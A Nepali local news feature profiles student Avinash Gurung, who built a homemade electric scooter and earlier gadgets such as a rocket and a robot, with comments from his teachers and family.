उनको कक्षा– ४ मा पढ्दादेखि नै यस्तो सीपतर्फ रुचि जागृत भएको उनले बताए । त्यो प्रेरणाको स्रोत भने अन्य कोही नभएर सोही गाउँकै उनका आफ्नै मामा अर्जुन गुरुङ भएको उनले जानकारी दिए । उनी मामा घरमा गएको बेलामा मामा अर्जुन गुरुङले रिमोटबाट चल्ने मोटर बनाएका रहेछन्, त्यो बेलामा उनी कक्षा– ४ मा पढ्थे । उनले भने, ‘त्योसँगै सिलिङ पंखा बनाएर चलाएको देखेँ ।’ उनका अनुसार त्यो बेलासम्म गाउँमा विजुली गएको थिएन । मामाको त्यो काम देखेर उनले पंखा कसरी चल्छ होला ? म त्यस्तो काम गर्न सक्छु होला कि सक्दिन होला ? भन्ने जिज्ञासा उत्पन्न भयो र प्रयास गर्न थालेको उनले सुनाए । उनी भन्छन्, ‘इच्छा र प्रयास गर्यो भने हुने रहेछ ।’ उनले कक्षा– ४ मा पढ्दा यौटा सानो डोजर बनाएर साथीहरूलाई देखाएको जानकारी दिए । उनका मामा अर्जुनले सोही ईशानेश्वर माविबाट कक्षा– १२ उतीर्ण गरेर गाउँमा फर्के, जागिर नपाए पछि भने उनले हिजोआज त्यस्तो काम गर्नु छाड्नु भयो । ‘मामा हिजोआज खेतीपाती गरेर बस्नु भएको छ’ अविनाशले सुनाए । यस प्रकार अवसर नपाउदा प्रतीभा कसरी पलायन हुन्छ भन्ने अर्जुन गुरुङ दरिलो उदाहरण बन्नु भएको छ ।
कक्षा– ७ मा पढ्दा उनले रिमोटबाट चल्ने कार बनाएको उनले सम्झे । उनी भन्छन् ‘त्यसपछि हरेक वर्ष केही न केही बनाउँदै आएको छु ।’ कक्षा– ८ मा ईशानेश्वर माविमा पढ्न गएको पहिलो वर्ष साथीहरू, त्यो ठाउँ परिवेश, शिक्षकहरू चिन्नमै समय लागेको हुँदा यस्तो सिर्जनामा ध्यान दिन पाइन । कक्षा– ९ मा केवलकार बनाएको थिएँ यो प्रतिनिधिसँगको भेटमा उनले भने ।

कक्षा– १० मा पढ्दा हेलिकप्टर बनाएर देखाएका थियो । यस्तो प्रतीभाका धनी उनले कक्षा– ११ मा अध्ययन गर्दा रकेट निर्माण गरेर उडाए, हामी सबै चकित परियो, सोही माविका शिक्षक समेत रहनु भएका साहित्यकार रमेशचन्द्र घिमिरेले बताउनु भयो । उहाँका अनुसार त्यो बाबु नपत्याउँदो छ, विद्युतीय सामग्री मात्र बनाउने हो र ? अविनाशको प्रतीभाको वखान गर्दै घिमिरेले भन्नुभयो, ‘उनी कलाकारिता(चित्र लेखन), नृत्य, संगीत लगायतका सीपमा पनि उत्तिकै पोख्त छन् ।’
आफूले बनाएको ‘विद्युतीय स्कुटर’को दुवै पांग्रामा ब्रेक जडान गरेका उनले अगाडि र पछाडिको पांग्रा सानोखाले साइकलको राखेको जानकारी दिए । उनी भन्छन् ‘अँध्यारोमा गुडाउन सकियोस् भनेर लाइट समेत जडान गरेको छु ।’ ‘इलेक्ट्रिक स्कुटर’ बनाउन करिब एक महिना लागेको बताउने उनले टिन त्यसको अन्य सामग्री भने ग्रिल उद्योगमा पाइने फलामका सामग्रीबाट प्रयोग गरेको जानकारी दिए । उनले भने, ‘स्कुटरमा उनले २४ भोल्ट २ सय ५० वाटको मोटर प्रयोग गरेको छु ।’
स्कुटर एक पटक चार्ज गरेपछि ३ देखि ४ किलोमिटरसम्म गुड्ने उनको भनाई छ । ‘स्कुल जान–आउन हिँडेर १५ मिनेट लाग्ने गरेको थियो अहिले यही स्कुटर प्रयोग गर्छु, स्कुटीमा ५÷६ मिनेटमा लाग्छ,’ उनले उल्लेख गरे । उनका अनुसार स्कूल र घरको दुरी करिब डेढ किलोमिटर रहेको छ ।
उनी सो माविको बालीविज्ञान विषयमा कक्षा १२ मा अध्ययनरत हुन् । उनले आफ्नो ज्ञान, सीप र आफ्नै खर्चमा निर्माण सामग्री सङ्कलन गरी बनाएको विद्युतीय स्कुटर करिब ५५ हजारको लागतमा तयार भएको अविनाश गुरुङले बताएका छन् । त्यो उनी आफैले निर्माण गरेको स्कुटीमा आउन जान थालेको वडादशैं अघिदेखिनै हो सो माविका प्रधानाध्यापक रामकृष्ण घिमिरेले जानकारी दिनु भयो । उहाँले भन्नुभयो ‘ससाना ५– ६ हजारका वस्तु(सामग्री) चाहियो भने हामीले विज्ञान प्रयोगशाला मार्फत उपलब्ध गराइदिने गरेका छौं ।’ धेरै जसो त उसले घरमै बाबुआमासँग पैसा मागेर ल्याउने गरेको छ पहाडको विद्यालय त्यस्तो मनग्य खर्च गर्ने सामर्थ पनि विद्यालयको छैन प्रअ घिमिरेले बताउनु भयो ।
उनी तिनै प्रतीभाशाली विद्यार्थी हुन्– जसले गत वर्ष विद्यालयले आयोजना गरेको विज्ञान प्रदर्शनीमा रकेट उडाएका थिए । कक्षा– ९ मा अध्ययनरत रहँदा उनले ड्रोजर बनाएर विद्यालयको वार्षिकोत्सवमा देखाएको सो माविका शिक्षक रमेशचन्द्र घिमिरेले बताउनु भयो । उहाँका अनुसार उनीसँग कोरियोग्राफीको पनि राम्रो अनुभव छ । शिक्षक घिमिरेले भन्नुहुन्छ, ‘ती विद्यार्थीले परार साल कक्षा– १० मा पढ्दा उनले विद्युतीय रोबोट समेत तयार पारेर देखाएका थिए ।
अविनाश गुरुङसँग राम्रो चित्र कोर्न सक्ने क्षमता पनि छ जसमा उनले कलात्मक पेन्टिङ समेत गर्छन् । उनको नाटक कलामा पनि राम्रो अभिनय गर्ने क्षमता रहेको छ । उनले संगीत समेत सिकेका रहेछन् ।
उनका बाबु आशबहादुर गुरुङ पछिल्ला १० वर्षदेखि कतारमा वैदेशिक रोजगारीमा हुनुहुन्छ । यतिबेला उहाँ छुट्टीमा घरमा आउनु भएको रहेछ । छोराले त्यस्तो कुनै चाहना गरेर भन्यो भने र उसले, हाम्रो गाउँ ठाउँ जिल्लाको इज्जत बढ्ने काम हुन्छ भने एकलाख रुपैयाँसम्मको खर्च आफूले दिन सक्ने उहाँको भनाई छ । उहाँले भन्नु भयो, ‘यस्तो काममा सकेसम्म उसलाई पैसा नभएर यो काम गर्न सकिन भन्ने नहोस् भन्ने विचार छ । तर सधैं त म पनि कसरी दिन सकुला र ?’ उहाँले प्रतिप्रश्न गर्नुभयो । अविनाशकी आमा उरमाया गुरुङ गृहिणी हुनुहुन्छ, उहाँको लेखपढ पनि खासै छैन । त्यो परिवारमा दुई भाइ छोरा छन् । ती मध्ये अविनाश जेठा हुन् । उनी आमा र भाइका साथमा भोर्लेटारमा डेरामा बस्दै आएका छन् । अविनाशका भाइ अभिषेक ईशानेश्वरमै कक्षा ८ मा पढ्छन् ।
विद्यार्थी मान्छे पढ्नु पर्छ होला यस्तो काम गर्ने समय कति बेला पाउँछौ ? भन्ने यो प्रतिनिधिको जिज्ञासामा उनले भने, ‘साँझ विहानको समय र बिदाको दिनमा यस्तो काम गर्ने गरिआएको छु ।’ धेरै जसो बनाउँदै भत्काउँदै गर्छु उनी भन्छन् । ‘किन नि ?’ भन्ने थप जिज्ञासामा ‘सामग्री धेरै हुँदैन अनि, पहिलो पटक बनाएकोमा चित्त पनि बुझ्दैन र अलिक राम्रो बनाउनका लागि पनि भत्काएर दोस्रो– तेस्रो पटक बनाउँछु । आफ्नो चित्त बुझेपछि बल्ल साथीहरूलाई देखाउछु ।’ उनले भने ।
अबका दिनका योजना के छन् ? भन्ने अर्को जिज्ञासामा ‘हाईड्रो पावरबाट चल्ने इरिगेसन पम्प र प्लास्टिक रिसाइकल गर्ने मेसिन तयार गर्ने रहेको’ अविनाशले जानकारी दिए ।

उनी भन्छन्, ‘छ न त अरु पनि योजना छ तर पहिले यी सामग्री बनाउँ त्यसपछि अरु क्रमशः बनाउछु, खर्च र समयले पनि भ्याउनु पर्यो ।’
बाली विज्ञानका विद्यार्थी उनी भोलिका दिनमा भने के गर्ने वा बन्ने भन्ने निश्चित गर्र्न सकेका छैनन् । आर्थिक कमजोर अवस्थाको कारणले गर्दा ‘यही गर्छु’ भन्ने निर्णय गर्न नसकेको उनी बताउँछन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=11950 0